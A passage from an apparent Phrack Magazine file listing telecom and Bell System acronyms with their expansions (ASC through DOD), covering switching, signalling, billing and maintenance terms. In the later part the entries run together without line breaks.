ASC         Alarm surveillance and control
ASCC2       Advanced serial communication controller
ASCII       American standard code for information interchange
ASCII       American standard code for information interexchange
ASD         Automated SMAS diagnostics
ASDPE       Synchronous data link controller (SDLC) A reset
ASE         Application service element
ASEC        Assignment section
ASGN        Assign
ASGNMTS     Assignments
ASIC        Application specific integrated circuit
ASM         Analog subscriber module
ASOC        Administrative service oversight center
ASP         Advanced service platform
ASP         Arcofi signal processor
ASPACGCOMP  ASP SCP response message with an ACG component received at the switch
ASPBADRESP  ASP SCP response message received with invalid data
ASPEN       Automatic system for performance evaluation of the network
ASPNORTEMSG  ASP reject message ret err and a play announc recei at the switch from the SCP
ASPSNCOMP   ASP SCP response message with a send notifi component received at the switch
ASPTNMSG    ASP termination notification message sent from the switch to the SCP
ASR         Access service request
ASSN        Assignment
AST         Position acknowledge seizure signal time-out (MDII)
ASYNC       Asynchronous
AT          Access tandem
AT          International/overseas audio (part time) INTER/TRA blocal 1-26
AT&T        American telephone and telegraph
AT-1        Auto test-1
AT-2        Auto test-2
AT01        Results of trunk test - 1AESS automatic trunk test
ATA         Automatic trunk analysis
ATAB        Area trunk assignment bureau
ATAI        Automatic troubler analysis interface
ATB         All Trunks Busy
ATB         All trunks busy
ATC         Automated testing control
ATC         Automatic transmission control
ATD         Accept date
ATD         Async. TDM
ATH         Abbreviated trouble history
ATI         Automatic test inhibit
ATI         Awake TI
ATICS       Automated toll integrity checking system
ATIS        Automatic transmitter identification system
ATM         Analog trunk module
ATM         Asynchronous transfer mode
ATM         Automatic teller machine
ATMS        Automated trunk measurement system
ATN         Assigner's telephone number
ATO         Time-out waiting for address complete signal
ATP         All tests pass
ATR         Alternate trunk routing
ATRS        Automated trouble reporting system
ATTC        Automatic transmission test and control circuit
ATTCOM      AT&T communications
ATTG        Attendant group
ATTIS       AT&T information system
AU          Access unit
AU          Autoscript INTER/TRA blocal 1-26
AU          Auxiliary
AUD         Assignment list audit
AUD         Audits
AUDIT       Audit detected problem.
AUDIX       Audio information exchange
AUP         Access unit port
AUTO        Automatic
AUTODIN     Automatic digital network
AUTOSEVCOM  Automatic secure voice communications
AUTOVON     Automatic voice network
AUXF        Auxiliary frame
AVD         Alternate voice data
AVD         Alternate voice-data
AWI         Awake indication
AZD         All zeros data
B           B side (pair) (lead)
B           Bridged connection
B           Equipment number
B6ZS        Bipolar with 6 zero substitution
B8ZS        Bipolar eight zero suppression encoding (DS-1)
B8ZS        Bipolar with 8 zeros substitution (T1 pri)
B911        Basic 911
BA          Basic access
BA          Protective alarm (CD) INTER/TRA blocal 1-26
BAF         Blocking acknowledgment failure
BAI         Bridge lifter assignment inquiry
BAL         Balance
BAMAF       Bellcore AMA format
BANCS       Bell administrative network communications system
BANKS       Bell administration network systems
BAPCO       Bellsouth advertising & publishing company
BAS         Basic activity subset
BAT         Battery (-48v)
BAx         Business address x (x = number of line)
BB          Blue box
BBD0/1      Binary 0s or 1s detected in b and d channels
BCC         Bellcore client companies
BCC         Block check character
BCC         Blocked call cleared
BCCP        Bearer ccp
BCD         Binary coded decimal
BCD         Blocked call delayed
BCFE        Busy call forwarding extended
BCID        Business customer identifier
BCLID       Bulk calling line identification
BCMS        Basic call management system
BCS         Batch change supplement (NTI) (DMS-100)
BDCA        Unk
BDCS        Broadband digital cross-connect system
BDS         Basic data service
BDT         Billing data transmitter
BEF         Band elimination filter
BEL         Bell
BELLCORE    Bell communications research
BER         Bit error rate
BERT        Bit error rate test
BETRS       Basic exchange telecommunications radio service
BG          Battery and ground signaling
BG/EEE      Below ground electronic equipment enclosures
BHC         Busy hour call
BHC         Busy hour calls
BIB         Backward indicator bit (SS7)
BICU        Bus interface control unit
BIFIFO      Bidirectional fifo
BIR         Bit receiver
BIR         Bus interface register
BISDN       Broadband ISDN
BISP        Business information system program
BISYNC      Binary synchronous communications
BIT         Bit
BIT         Bit transmitter
BITNET      Because-it's-time network
BITR        Bit transceiver
BIX         Building internal cross-connects
BK          Back
BKUP        Backup
BKUP        Requests a backup
BL          Bell & lights INTER/TRA blocal 1-26
BL          Bridge lifter
BL          Bridge lifters - COSMOS command
BL/DS       Busy line/don't answer
BLA         Blocking acknowledgement (SS7: in ISUP)
BLF         Busy line field
BLFCA       Blocking a fully coded addressed international outbound call routed to a non-common channel signaling trunk
BLK         Block
BLKD        Blocked
BLO         Blocking (SS7: in ISUP)
BLS         Bridge lifter status
BLS         Business listing service
BLV         Busy line verification
BMC         Billing media coverage
BMD         Batch mode display
BMI         Batch mode input - TIMEREL and DEMAND
BMOSS       Building maintenance operations service system
BMR         Batch mode release
BMU         Basic measurement unit (dip)
BND         Band number
BNS         Billed number screening
BNSDBOV     BVA BNS message received indicating data base overload
BNSDBUN     BVA BNS message returned because data base unable to process
BNSGMSG     BVA BNS message received garbled
BNSNBLK     BVA BNS message returned because of network blockage
BNSNCON     BVA BNS message returned because of network congestion
BNSNRTE     BVA BNS message returned because of no routing data
BNSTOUT     BVA BNS message returned because of timeout
BNSUNEQ     BVA BNS message returned because of unequipped destination
BNSURPY     BVA BNS message received with an unexpected reply
BNx         Business name x (x = number of line)
BOC         Bell operating companies
BOC         Bell operating company
BOCC        Building operations control center
BOP         Byte oriented protocol
BOR         Basic output report
BORSCHT     Battery
BOS         Bit oriented signaling
BOS         Business office supervisor
BOSS        Billing and order support system
BOSS        Business office service system (NYNEX)
BOT         Beginning of tape
BOT         Bottom
BPI         Bits per inch
BPOC        Bell point of contact
BPS         Bits per second
BPSK        Binary psk
BPSS        Basic packet-switching service
BPUMP       Backup pump
BR          Bit robbing (CAS-BR)
BRAT        Business residence account tracking system
BRCF        Business and residential customer service feature
BRCS        Business and residential customer services
BRCS        Business residence custom service
BRDCST      Broadcast
BRDG        Bridge
BRDGD       Bridged
BREVC       Brevity control
BRG         Baud rate generator
BRI         Basic rate interface
BRITE       Basic rate interface transmission extension (5ESS)
BRK         Break
BRM         Basic remote module
BRM         Bell communications research practice
BRST        Bridge signature table
BS          Backspace
BS          Banded signaling
BS          Bias battery (-19.1v)
BS          Siren control INTER/TRA blocal 1-26
BSA         Basic serving arrangements
BSBH        Busy season busy hour
BSC         Business service center
BSC/RSC     Business/residence service center
BSCM        Bisynchronous communications module
BSDPE       SDLC B reset
BSE         Basic service elements
BSF         Bell shock force
BSI         British standards institution
BSN         Backward sequence number (SS7)
BSOC        Bell systems operating company
BSP         Bell system practice
BSRF        Basic standard reference frequency
BSRFS       Bell system reference frequency standard
BST         Basic services terminal
BSTJ        Bell system technical journal
BT          British telecom
BTAM        Basic telecommunications access message
BTH         Both
BTL         Bell telephone laboratories
BTN         Billing telephone number
BTSR        Bootstrapper board
BTU         British thermal unit
BUFF        System buffers (NTI)
BVA         Billing validation application
BVAPP       Billing verification and authorization for payment process
BVC         Billing validation center
BVS         Basic voice service
BWM         Broadcast warning message
BWT         Broadcast warning twx
BWTS        Bandwidth test set
BYF         Display the bypass file
BYP         Change the contents of the bypass file
C           Counting rate
C           Current supervision
C           Scan point (SP)
C&A         Centrifugal and absorption
C-ACD       Commercial-automatic call distributor (OSPS)
C-NCH       C-notch
C/I         Command/indicate
C/S UNIT    Combiner and splitter
C1          Circuit system
CA          Cable
CA          Cable number
CA          Collision avoidance
CA          SSN access INTER/TRA blocal 1-26
CABS        Carrier access billing system
CAC         Calling-card authorization center
CAC         Carrier access code
CAC         Circuit administration center
CAC         Customer administration center
CACHE       Cache errors
CAD         Computer-aided dispatch
CAD         Critical alarm display
CADN        Circuit administration.
CADV        Combined alternate data/voice
CAF         Circuit reset acknowledgment failure
CAFD        Comptrollers' automatic message accounting format description
CAFD        Controllers automatic message accounting format description
CAI         Address incomplete received
CAI         Call assembly index
CAIS        Colocated automatic intercept system
CALRS       Centralized automatic loop reporting system
CAM         Communication access method
CAM         Computer aided manufacturing
CAM         Content addressable memory
CAM         Control administration module
CAMA        Central automatic message accounting.
CAMA        Centralized auto message accounting
CAMA        Centralized automatic message accounting
CAN         Cancel
CANC        Cancel (i.451)
CANF        Clear the cancel from
CANT        Clear the cancel to
CAP         Capacitance
CARL        Computerized administrative route layout
CAROT       Centralized automatic reporting on trunks
CAROT       Centralized automatic reporting on trunks.
CAS         Channel associated signaling
CAS         Circuit associated signaling
CAS         Computerized autodial system
CAS         Craft access system (SARTS)
CAS         Customer account service
CAS7ABM     CAS common channel signaling 7 (CCS7) abort message received
CAS7ACG     CAS CCS7 ACG invoke component received
CAS7GMG     CAS CCS7 received with invalid format reply
CAS7GWE     CAS CCS7 error
CAS7NCG     CAS CCS7 message returned because of network congestion
CAS7NFL     CAS CCS7 message returned because of network failure
CAS7RCR     CAS CCS7 reject component received
CAS7SCG     CAS CCS7 message returned because of subsystem congestion
CAS7SFL     CAS CCS7 message returned because of subsystem failure
CAS7TAN     CAS CCS7 message returned
CAS7TOT     CAS CCS7 query which timed out before reply received
CASDBOV     CAS message received indicating data base overload
CASDBOV     Customer account services (CAS) message received indicating data base overload
CASDBOV     Customer account services (CAS) message received indicating database overload
CASDBUN     CAS message returned
CASGMSG     CAS message received garbled
CASNBLK     CAS message returned because of network blockage
CASNCON     CAS message returned because of network congestion
CASNRTE     CAS message returned because of no routing data
CASTOUT     CAS message returned because of timeout
CASUNEQ     CAS message returned because of unequipped destination
CASURPY     CAS message received with an unexpected reply
CAT         Centrex access treatment
CAT         Craft access terminal
CATLAS      Centralized automatic trouble locating and analysis system
CAY         Create an assembly
CB          OCC audio facilities INTER/TRA blocal 1-26
CBA         Change back acknowledgement (SS7: in mtp)
CBD         Change back declaration (SS7: in mtp)
CBEMA       Computer and business equipment manufacturers' assc.
CBERR       Correctable bit error
CBS         Crossbar switching
CBX         Computerized branch exchange
CC          Call count
CC          Central control
CC          Central controller
CC          Common channel (CAS-CC)
CC          Common control
CC          Connection confirm
CC          Country code
CC          Country code (ISO 7498)
CC          Initials of person closing report out to catlas.
CC          OCC digital facility-medium speed INTER/TRA blocal 1-26
CC1         Call control 1 (IOS)
CCA         Change customer attributes
CCA         Computer content architecture (ISO 8637/2)
CCBS        Completion of call to busy subscribers (i.253 c)
CCC         Central control complex
CCC         Central control complex
CCC         Clear channel capability
CCC         Computer control center
CCD         Change due date - COSMOS command
CCDDBOV     BVA calling card (CCRD) message received indicating data base overload
CCDDBUN     BVA CCRD message returned because data base unable to process
CCDGMSG     BVA CCRD message received garbled
CCDNBLK     BVA CCRD message returned because of network blockage
CCDNCON     BVA CCRD message returned because of network congestion
CCDNRTE     BVA CCRD message returned because of no routing data
CCDR        Calling card
CCDTOUT     BVA CCRD message returned because of timeout
CCDUNEQ     BVA CCRD message returned because of unequipped destination
CCDURPY     BVA CCRD message received with an unexpected reply
CCF         Custom calling features
CCH         Connections per circuit per hour
CCIR        Comite' consultatif international des radio communications
CCIR        Consultative committee for radiocommunication (international radio
CCIS        Common channel interoffice signaling
CCITT       Comite' consultatif international telegraphique et telephonique
CCITT       Consultative committee for internat. telephone and telegraph
CCM         Customer control management
CCNC        CCS network control
CCNC        Common channel network controller
CCNC        Computer/communications network center
CCOA        Cabinet control and office alarm
CCP         Call control part
CCR         Clock configuration register
CCR         Continuity check request (SS7: in ISUP)
CCR         Customer-controlled reconfiguration
CCRC        Corrupt crc (IOM2 monitor command)
CCRD        Calling card (5E)
CCRS        Centrex customers ... system
CCS         Centum Call Seconds
CCS         Cluster support system
CCS         Common channel signaling
CCS         Custom calling services (NTI)
CCS         Hundred (C) call seconds
CCS         Hundred call seconds
CCSA        Common control switching arrangement
CCT         Central control terminal
CCT         Initialize and update the contractor-transducer file
CCTAC       Computer communications trouble analysis center
CCU         Colt computer unit
CCU         Combined channel units
CCU         Communication control unit
CCV         Calling card validation
CD          Call deflection (i.252 e)
CD          Collision detection (->csma/)
CDA         Call data accumulator
CDA         Change distribution attributes
CDA         Coin detection and announcement
CDACS       Concentrating DACS
CDAR        Customer dialed account recording
CDC         Central distribution center
CDCF        Cumulative discounted cash flow
CDD         Change due date
CDF         Combined distributing frame
CDF         DTF coin
CDFI        Communication link digital facilities interface
CDI         Circle digit identification
CDI         Connected line identification (i.251 C/E)
CDI         Control and data interface.
CDI         Control data interface
CDIG        Circle digit translation (NTI)
CDM         Coax data module
CDMA        Code division ma
CDO         Community dial office
CDPR        Customer dial pulse receiver
CDQ1        Custom calling services discount quote
CDR         Call detail record
CDR         Call dial rerouting
CDR         Collision detect input line
CDR         Cut thru dip report
CDRR        Call detail recording and reporting
CDS         Circuit design system
CDS         Codes
CDS         Craft dispatch system
CE          Collision elimination (->CSMA/)
CE          Common equipment data (NTI)
CE          Conducted emission (EME)
CE          SSN station line INTER/TRA blocal 1-26
CEF         Cable entrance facility
CEI         Comparable efficient interconnection
CEI         Comparably efficient interconnection
CEN         European committee of standards
CENELEC     European committee of standards (electrotechnics)
CEP         Connection endpoint
CEPT        European conference of post/telecom administrations
CES         CC error summary
CEU         CCS estimated usage
CEV         Control environmental vault
CEV         Controlled environment vault
CF          Coin first
CF          OCC special facility INTER/TRA blocal 1-26
CFA         Carrier failure alarms
CFA         Change facility attributes
CFC         Cost function code
CFCA        Communications fraud control association
CFD         Coinless ANI7 charge-a-call
CFGN        Configuration
CFI         Configurable interface (SIPB)
CFINIT      Custom calling feature table
CFN         Call forward number
CFND        Call forward number don't answer
CFNR        Call forwarding no reply (i.252 c)
CFP         Call forwarding busy (i.252 b)
CFP         Print the class of service/features for an electromechanical enti
CFR         Code of federal regulations
CFT         Craft
CFU         Call forwarding unconditional (i.252 d)
CFU         Change facility usage
CG          Control group number
CG          OCC telegraph facility INTER/TRA blocal 1-26
CG01        Carrier group in alarm - 1AESS carrier group
CG03        Reason for above - 1AESS carrier group
CGA         Carrier group alarm
CGA         Carrier group assignment
CGAP        Call gapping
CGAP        Call gapping code controls messages.
CGB         Circuit group blocking (SS7: in ISUP)
CGBA        CGB acknowledgement
CGM         Computer graphics metafile (ISO DIS 8632)
CGN         Concentrator group number
CGNC        Connector group network controller
CGU         Circuit group unblocking (SS7: in ISUP)
CGUA        CGU acknowledgement
CH          Change
CH          OCC digital facility high-speed INTER/TRA blocal 1-26
CHAN        Channel
CHAPS       UNK - a known AT&T System - def. unknown
CHAR        Character
CHG LASG    Change loop assignment
CHK         Check
CHR         Chronical
CI          Concentrator identifier trunk INTER/TRA blocal 1-26
CI0IN       Control interface 0 interrupt
CI1IN       Control interface 1 interrupt
CIB         Centralized intercept bureau
CIC         Carrier identification codes
CIC         Circuit identification code
CIC         Customer Information Center (AT&T)
CICS        Customer information control system
CID         Connection identification
CIE         Company establish company initiated change
CIF         Common intermediate format (for ISDN high end video)
CIH         Craft interface handler
CII         Call identity index
CII         Initial address message (IAM) irregularity (incoming)
CIMAP       Circuit installation and maintance assistance program
CIMAP/CC    Circuit installation and maintenance assistance/control center
CIP         Control interface port
CIRR        C/I receive register
CIS         Crimeline information systems
CIS         Customized intercept service
CIXR        C/I transmit register
CJ          OCC control facility INTER/TRA blocal 1-26
CK          Checkbits
CK          OCC overseas connecting facility wide-band INTER/TRA blocal 1-26
CKF         Continuity check failure (incoming)
CKID        Circuit identification
CKL         Circuit location
CKS         Clock select bit
CKT         Circuit
CKT         Circuit.
CKTRY       Circuitry
CL          Centrex CO line INTER/TRA blocal 1-26
CLASS       Centralized local area selective signaling
CLASS       Custom local area signaling service
CLC         Common language code for an entity
CLCI        Common language circuit identification
CLCT        Network management control counts
CLDIR       Call direction
CLDN        Calling line directory number
CLEI        Common language equipment identifier
CLF         Creating dips upper bound load factor
CLFI        Common lang facilities identification
CLI         COSMOS processed alit reports
CLI         Calling line ident
CLID        Calling line identification
CLIP        Calling line identification presentation (i.251 c)
CLIR        Calling line identification restriction (i.251 d)
CLK         Clock
CLL         Creating dips lower bound load factor
CLLI        Common-language location identification
CLNK        Communication link
CLNKs       Communication links
CLNORM      Communication link normalization
CLR         Circuit layout record
CLR         Clear
CLRC        Circuit layout record card
CLS         CLCI in serial number format
CLS         Connectless-mode service
CLSD        Closed
CLSV        Class of service
CLT         CLCI telephone number format
CLT         Communications line terminal
CLUS        Cluster data (NTI)
CM          C-message frequency weighting
CM          Communication module
CM          Connection memory
CM          OCC video facility INTER/TRA blocal 1-26
CMAC        Centralized maintenance and administration center
CMAP        Centralized maintenance and administration position
CMC         Call modification completed (SS7: in ISUP)
CMC         Cellular mobile carrier
CMC         Cellular mobile carrier
CMC         Construction maintenance center
CMD         Command
CMDF        Combined main distributing frame
CMDS        Centralized message data system
CMF         Capacity main station fill
CMP         Communication module processor
CMP         Communications module processor
CMP         Companion board
CMP         Corrective maintenance practices
CMPR        Compares
CMR         Call modification request (SS7: in ISUP)
CMR         Cellular mobile radio
CMRJ        CMR reject (SS7: in ISUP)
CMS         Call management system
CMS         Circuit maintenance system
CMS         Circuit maintenance system 1C
CMS         Circuit maintenance system
CMS         Communications management subsystem
CMS         Conversational monitoring system
CMT         Cellular mobile telephone
CMT         Combined miscellaneous trunk frame
CMU         CCS measured usage
CMU         Colt measurement unit
CN          C-notch frequency weighting
CN          Change notice
CN          Change notice
CN          Connection
CN          SSN network trunk INTER/TRA blocal 1-26
CN/A        Customer name/address
CN02        List of pay phones with coin disposal problems - 1AESS coin phone
CN03        Possible trouble - 1AESS coin phone
CN04        Phone taken out of restored service because of possible coin fraud
CNA         Communications network application
CNAB        Customer name/address bureau
CNCC        Customer network control center
CNI         Common network interface
CNMS        Cylink network management system
CNS         Complimentary network service
CNS         Concentrating network system
CNT         Count
CNTS        Counts
CNVT        Converted
CO          Central office
CO          Continuous (SARTS)
CO          OCC overseas connecting facility INTER/TRA blocal 1-26
CO UN       Central office unit code
COA         Change over acknowledgement (SS7 in MTE)
COAM        Centralized operation
COAM        Customer owned and maintained
COC         Circuit order control
COCOT       Customer-owned coin-operated telephone
COD         Code
CODCF       Central office data connecting facility
CODEC       Coder/decoder
COE         Central office entity
COE         Central office equipment
COEES       COE engineering system
COEES       Central office equipment engineering system
COER        Central office equipment record
COEST       Central office equipment signature table
COF         Confusion received (outgoing)
COFA        Change of frame alignment (DS-1)
COG         Centralized operations group
COGRDG      Central office grounding
COLP        Connected line identification presentation
COLR        Connected line identification restriction
COLT        Central office limit table
COLT        Central office line tester
COM         Common controller
COM         Communication
COM         Complement size
COM         Computer output microfilm
COM/EXP     PCM-compander/expander
COMM        Communication
COMMS       Central office maintenance management system
COMMS-PM    Central office maintenance management system-preventive Maintenance
COMP        Computed
COMPNY      Company
COMPS       Central Office Management Program (GTE)
COMSAT      Communications satellite
CON         Concentrator - COSMOS command
COND        Conditions
CONF        Conference calling (i.254 a)
CONFIG      Configuration
CONN        Connect msg. (i.451)
CONN        Connector
CONN        Nailed-up connections
CONT        Control
CONTAC      Central office network access
CONUS       Continental united states
COO         Change over order (SS7: in MTP)
COP         Call offering procedure
COPY        Data copied from one address to another - 1AESS copy
CORC        Commands and responses definition and compressing program (IOS)
CORC        Customer originated recent change
CORCs       Customer-originated recent changes
CORNET      Corporate network
COS         Connection-mode service
COSIB       Central office platform operator service interface board
COSMIC      Common systems main interconnection frame system (frame)
COSMOS      Computer system for mainframe operations
COT         Central office terminal
COT         Central office technician
COT         Central office terminal
COT         Central office terminal (opposite to RT)
COT         Continuity (SS7: in ISUP)
COTM        Central office overload call timing (NTI)
CP          Cable pair
CP          Call processing parameters (NTI)
CP          Communication processor (SARTS)
CP          Concentrator identifier signaling link INTER/TRA blocal 1-26
CP          Control program
CPA         Centralized/bulk power architecture
CPC         Cellular phone company
CPC         Circuit provision center
CPC         Circuit provisioning center
CPC         Circuit provisioning center (special services design group)
CPCE        Common peripheral controller equipment
CPD         Central pulse distributor
CPD         Common packet data channels
CPE         Customer premise equipment
CPE         Customer premises equipment
CPG         Call progress (SS7: in ISUP)
CPH         Cost per hour
CPI         COSMOS-premis interface
CPI         Computer private branch exchange interface
CPIE        CP or AM intervention interrupt error
CPM         COSMOS performance monitor
CPM         Circuit pack module
CPM         Cost per minute
CPMP        Carrier performance measurement plan
CPS         Cycles per second
CPU         CCS capacity usage
CPU         Call pick up
CPU         Call pickup group
CPU         Central processing unit
CQM         Circuit group query (SS7: in ISUP)
CQR         CQM response
CR          Carriage return
CR          Control Record
CR          Control response
CR          OCC backup facility INTER/TRA blocal 1-26
CRAS        Cable repair administrative system
CRC         Customer record center
CRC         Cyclic redundancy check
CRCOK       CRC ok! (C/I channel code)
CRE         Create
CRED        Credit card calling (i.256 a)
CREF        Connection refused
CREG        Concentrated range extension with gain
CRF         Continuity recheck failure (outgoing)
CRFMP       Cable repair force management plan
CRG         Creg tag
CRIS        Customer records information system
CROT        Centralized automatic reporting of trunks (NTI)
CRR         Reset received (incoming)
CRS         Centralized results system
CRSAB       Centralized repair service answering bureau
CRST        Specific carrier restricted
CRT         Cathode ray tube
CRT         Cathode-ray tube
CRTM        Central office regular call processing timing (NTI)
CS          Cable switching
CS          Call Store
CS          Channel service INTER/TRA blocal 1-26
CS          Conducted susceptibility (EMS)
CS          Customer class of service
CSA         Carrier serving area
CSACC       Customer service administration control center
CSAR        Centralized system for analysis and reporting
CSAR        Centralized system for analysis reporting
CSC         Cell site controller
CSD         Circuit specific data
CSDC        Circuit switched digital capability
CSDN        Circuit-switched data network (t.70)
CSF         Critical short form
CSMA/       Carrier sense multiple access
CSMCC       Complex services maintenance control center
CSNET       Computer science network
CSO         Central services organization
CSO         Cold start only (in eoc)
CSP         Coin sent paid
CSP         Coin set paid
CSPDN       Circuit-switched public data network
CSR         Clock shift register
CSR         Customer service records
CSS         Computer sub-system
CSS         Computer subsystem
CSS         Customer service system
CSSC        Customer service system center
CST         Call state or current state or change state (QUASI SDL)
CST         Combined services terminal
CSU         Channel service unit
CSUS        Centralized automatic message accounting suspension (NTI)
CT          Call transfer (i.252 a)
CT          Control terminal
CT          SSN tie trunk INTER/TRA blocal 1-26
CT01        Manually requested trace line to line information follows - 1AESS
CT02 Manually requested trace line to trunk information follows - 1AESS CT03 Intraoffice call placed to a number with CLID - 1AESS call trace CT04 Interoffice call placed to a number with CLID - 1AESS call trace CT05 Call placed to number on the ci list - 1AESS call trace CT06 Contents of the CI list - 1AESS call trace CT07 ACD related trace - 1AESS call trace CTC Central test center CTC Centralized test center (DDS) CTC Centralized testing center CTC Complete a cable transfer or complete a cable throw CTD Circuit test data CTE Cable throw order establishment CTF Display the contacter-transducer file CTI Circuit termination identification CTL Cable throw with line equipment assignment CTL Central operator control CTM Cable throw modification CTM Contac trunk module CTMC Communications terminal module controller CTMS Carrier transmission measuring system CTO Call transfer outside CTO Continuity timeout (incoming) CTP Print cable transfer frame work CTR Cable throw replacement CTS Cable throw summary CTS Call through simulator CTS Clear to send CTSS Cray time sharing system CTT Cartridge tape transport CTT Cut through tag CTTC Cartridge tape transport controller CTTN Cable trunk ticket number CTTU Central trunk testing unit. CTU Channel test unit CTW Withdraw a cable transfer or a cable throw CTX Centrex group number CTX Various centrix verifies CU Channel unit CU Channel unit CU Control unit CU Customer unit CU/EQ Common update/equipment system CU/TK Common update/trunking system CUCRIT Capital utilization criteria CUG Closed user group (i.255 a) CUP Common update processor CUSTAT Control unit hardware status CUT Circuit under test CUTOVER Cutover (pre-cut) inactive state. 
CV OCC voice grade facility INTER/TRA blocal 1-26 CVN Vacant national number received (outgoing) CVR Compass voice response CW Call waiting (i.253 a) CW OCC wire pair facility INTER/TRA blocal 1-26 CWC City-wide centrex CWD Call waiting deluxe CXC Complex service order input checker CXM Centrex table management CXT Complex order inquiry for nac review CZ OCC access facility INTER/TRA blocal 1-26 CorNet Corporate network protocol (ECMA and CCITT q.930/931 oriented)

==Phrack Magazine==
Volume Four, Issue Forty-Three, File 22 of 27

{Acronyms Part II}

D Data D Default supervision D Digits D Dispatch D Hotel/motel equipment from trouble report (TSPS only) D-CTL D channel controller (IDEC) D/A Digital to analog D1PK DS-1 interface pack (SCM-10S NTI) D1PK DS-1 interface pack (SCM-10S MUX NTI) DA Digital data off-net extension INTER/TRA blocal 1-26 DA Directory assistance DAC Digital to analog converter DAC Dispatch Administration Center DACC Directory assistance call completion DACK Direct memory access acknowledge DACOM Data communications corp. 
of korea (ROK) DACS Digital access cross-connect system DACS Digital accessed and cross-connected system DACS Directory assistance charging system DACTVTD Deactivated DAEDR Delimitation DAIS Distributed automatic intercept system DAML Digital added main line (pair gain) DAMT Direct access mechanize testing DAP Display administration process DAP Document application profile DARC Division alarm recording center DART Distribution area rehabilitation DARU Distributed automatic intercept system audio response unit DAS Data auxiliary set DAS Directory assistance system DAS Distributor and scanner DAS-WDT Distributor and scanner-watch dog timer DAS/C Directory assistance system/computer DASD Direct access storage device DASS2 Digital access signaling system 2 (BT) DAU Digital access unit DAV Data above voice DAY Delete an assembly DB DSSDS 1.5 mb/s access line INTER/TRA blocal 1-26 DB Decibel DBA Data base administrator DBAC Data base administration center DBAS Data base administration system DBCS Data bank control system DBL Data base load DBM Database manager DBMS Data base management system DBOS Data bank organization system DBS Duplex bus selector DBSS Data bank security system DC Device cinfirmation (C/I channel code) DC Dial code DC Direct current DCC Data collection computer DCC Data country code (ISO 7498) DCC Destination code cancellation DCC Destination code cancellation control DCC Digroup core controller DCCS Discontiguous shared segments DCD Data collection device DCE Data circuit terminal equipment DCE Data circuit-terminating equipment DCE Data communications equipment DCE Digital carrier equipment DCG Default cell group DCH D channel handler DCH D-channel handling bit DCH Discharge DCHOOS D-channel is out of service. DCL Data clock (i.e. 
IOM2) DCL Dec control language DCLU Digital carrier line uint DCLU Digital carrier line unit DCM Digital carrier module DCME Digital circuit multiplexing equipment DCMS Distributed call measurement system DCMU Digital concentrator measurement unit DCN List disconnected and changed numbers DCP D channel processor DCP Duplex central processor DCPR Detailed contuing property record (pics/dcpr) DCPSK Differential coherent phase-shift keying DCS Data communications subsystem DCS Digital crosconnect system DCS Digital cross-connect system DCS Direct current signaling DCSO Display compleated service order (lmos command) DCT Digital carrier trunk DCTB Dct bank DCTEXT DCT extended DCTN Defense commercial telecommunications network DCTS Dimension custom telephone service DCTUCOM Directly connected test unit common board DCTUPORT Directly connected test unit port circuit DCn Device control n DD Data downstream (i.e. IOM2) DD Delay dial DD Disk drives DD Due date DD Total switching control center (SCC) and field work time. DDC Direct department calling DDCMP Daily display conversation mode and printer DDD Direct distance dialing DDGT Digital data group terminal DDI Direct dialing-in (i.251 A) DDN Defense data network DDOV Digital data over voice DDS DDS loopback test (SARTS command) DDS Dataphone digital service DDS Digital data service DDS Digital data system DDS Digital data system (the network) dataphone digital DDS Digital dataphone service DDS Display the DS table DDX Digital data exchange DDX Distributed data exchange DEAC Deactivation (C/I channel code) DEACT Deactivate DEC Digital equipment corporation DECT Digital european cellular phone DEL Delete DEN Digital equipment number DERP Defective equipment replacement program DES Data encryption standard DES Destination DEST Destinations DET Detatch MSG. 
(i.451) DEV Deviation DEV Device DEW Distant early warning (line) DF Distributing frame DF Distribution frame DF HSSDS 1.5 mb/s hub to hub INTER/TRA blocal 1-26 DFC Disk file controller DFI Digital facility interface DFI Digital facility interface. DFI Digital family interface DFIH Digital facility interface circuit pair DFMS Digital facility management system DFTAC Distributing frame test access circuit DG HSSDS 1.5 mb/s hub to earth station INTER/TRA blocal 1-26 DGCT Diagnostic control table DGN Diagnose DGN Memory failure in CS/PS diagnostic program - 1AESS mem diag DH Digital service INTER/TRA blocal 1-26 DI Deactivation indication (C/I channel code) DI Direct-in dial INTER/TRA blocal 1-26 DI Unk division? DIA Document interchange architecture DIAG Diagnostic DIC Digital concentrator DIC Digital interface controller DID DI downstream DID Direct inward dialing DIF Digital frame interface DIF Digital interface DIF Digital interface frame DIFF Difference DILEP Digital line engineering program DIM Data in the middle DIP Dedicated inside plant COSMOS command DIP Dip creation option DIP Document interchange protocol (lower sublayer of OSI layer 6) DIP Dual in-line package DIR Direction DIR Directory DIR Standard dip report DIS Disconnect DIS Display DISA Direct inward system access DISABL Disable DISC Disconnect (LAP-D command) DISD Direct inward subscriber access DIST Distribute point board DIU Deactivate indication DIU Digital interface unit DIU Digroup interface unit (DACS) DIV (Ger) Digital exchange DIVF (Ger) Div for long distance service DIVO (Ger) Div for local service DJ Digit trunk INTER/TRA blocal 1-26 DK Data link INTER/TRA blocal 1-26 DL Dial DL Dictation line INTER/TRA blocal 1-26 DL1PE DLI 1 parity error DL5MDA Someone who collects each ISDN abbrevation crossing his way DLAB Divisor latch access bit DLC Data link control DLC Data link controller assignment for clusters DLC Digital loop carrier DLCI Data link connection identifier (i.440: SAPI+TEI) DLCU 
Digital line carrier unit DLE Data link escape (ascii control) DLI Data link interface DLI0I Data link 0 interrupt DLI1I Data link 1 interrupt DLISW DLI switch error DLL Dial long lines DLM Data link module DLN Direct link node DLNORSP Init response not received from data link. DLOPE Dual link interface (DLI) 0 parity error DLP Data level point DLS Digital line section DLS Digital link service DLTHA Display trouble history all (LMOS command) DLTU Digital line trunk unit DLTU Digital line/trunk unit DLU-PG Digital line unit-pair gain DLUC Digital line unit control DLYR Delayed readiness DM DMR DM Delta modulation DM Disconnected mode (LAP-D response) DMA Direct memory access DMB Digital multipoint bridge DMERT Duplex multiple environment real time DMI Digital multiplexed interface DML Data manipulation logic DMLHG DSN/AUTOVON MLHG DMQ Deferred maintenance queue DMS Data management system DMS Digital multiplex system (i.e. DMS 10, DMS 100) DMS Digital multiplexed system DMU Data manipulation unit DN Directory number DN Directory numbers DN Distribution network panel DN Down DN Mail distribution frame - COSMOS defult DNC Dynamic network controller DNH Directory Number Hunting DNHR Dynamic non hierarchical routing DNHR Dynamic nonhierarchical routing DNI Digital network interconnecting DNIC Data network identification code DNIC Data network identification code (ISO 7498) DNR Detaled number record DNR Dialed number recorder DNX Dynamic network X-connect DO Direct-out dial INTER/TRA blocal 1-26 DOC Dynamic overload control DOC Dynamic overload controls messages. DOCS Display operator console system DOD (USA) Dept. 
